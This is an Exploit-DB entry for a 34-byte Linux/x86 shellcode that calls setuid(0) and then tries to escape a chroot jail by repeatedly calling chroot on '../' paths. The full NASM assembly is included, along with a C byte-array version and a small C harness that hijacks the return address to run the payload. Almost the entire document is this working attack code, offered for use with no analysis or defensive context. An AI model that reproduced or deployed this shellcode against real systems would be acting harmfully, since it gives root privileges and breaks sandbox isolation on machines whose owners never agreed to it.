Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)

2009-01-01T00:00:00
ID EDB-ID:43631
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes). Shellcode exploit for Linux_x86 platform

                                        
                                            /* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
   in the !!world!!
   it will put '../' 10 times
   Size  34 bytes
   OS	 Linux
  		/rootteam/dev0id	(rootteam.void.ru)
			dev0id@uncompiled.com 

BITS	32
main:
	xor	ecx,ecx
	xor	eax,eax
	xor	ebx,ebx
	mov	al,23
	int	0x80
	push	ecx
	mov	cl,30
main_push:
	push byte 0x2e
	loop	main_push
	mov	cl,30
main_inc:
	dec	cl
	inc byte [esp+ecx]
	dec	cl
	loop	main_inc
	mov	ebx,esp
	mov	al,61
	int	0x80








*/

char shellcode[] =
	"\x31\xc9\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x51\xb1\x1e\x6a\x2e"
	"\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x89\xe3"
	"\xb0\x3d\xcd\x80";
int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}